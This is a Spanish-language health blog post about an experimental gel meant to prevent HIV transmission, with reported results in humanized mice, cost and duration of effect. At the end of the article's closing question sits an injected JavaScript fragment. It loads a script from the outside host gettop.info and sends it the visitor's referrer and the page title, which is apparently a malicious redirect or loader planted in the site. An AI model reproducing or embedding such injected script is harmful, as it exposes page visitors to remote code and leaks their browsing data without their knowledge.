Salud y belleza » Enfermedades, Medicina, Salud, Salud sexual

El gel que podría prevenir el Sida

Sin Comentarios

La enfermedad que trae de cabeza a la sociedad moderna porque no consiguen controlarla, sobre todo en los países subdesarrollados, el sida o la infección por VIH. Los preservativos son eficaces para su prevención, pero resultan muy caros y además requieren la complacencia de la pareja sexual. Pero investigadores españoles han desarrollado un gel que podría prevenir la infección por el VIH durante las relaciones.

gel-contra-sida

Este gel se aplicaría in Vitro en la vagina o en el recto. No necesitaría el consentimiento de la pareja, por lo que muchas mujeres (principales afectadas) podrían ponérselo perfectamente para prevenir. El principal problema de este tipo de productos se ha solucionado: no irrita los genitales ni las partes donde se aplica.

Por ahora ha demostrado en ratones humanizados una efectividad del 90%. Aunque hasta dentro de media década no se podrá probar en humanos, supone un gran avance y una noticia estupenda. Sobre todo porque el precio no superará el euro y medio y será mucho más inferior en los países del tercer mundo para que puedan adquirirlo las sociedades más afectadas por esta enfermedad. Si solo el 30% de las mujeres lo utilizaran podrían evitarse 3,7 millones de contagios al año.

gel-vihLos beneficios de este nuevo gel frente a anteriores es que no produce irritaciones y permite la movilidad de los espermatozoides. Además, después de su aplicación es eficaz en las siguientes 18 o 24 horas. En ese tiempo se podrían mantener relaciones sexuales de forma seguras evitando el contagio.

Ahora hay que esperar a que se hagan las pruebas y ensayos pertinentes para conseguir las demostraciones que validen este gel y en unos años los tendremos en las farmacias y quién sabe si en menos de una década conseguiremos reducir el número anual de contagios y en un futuro erradicar la enfermedad.

¿Qué opinas de este gel? ¿Lo ves útil?d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.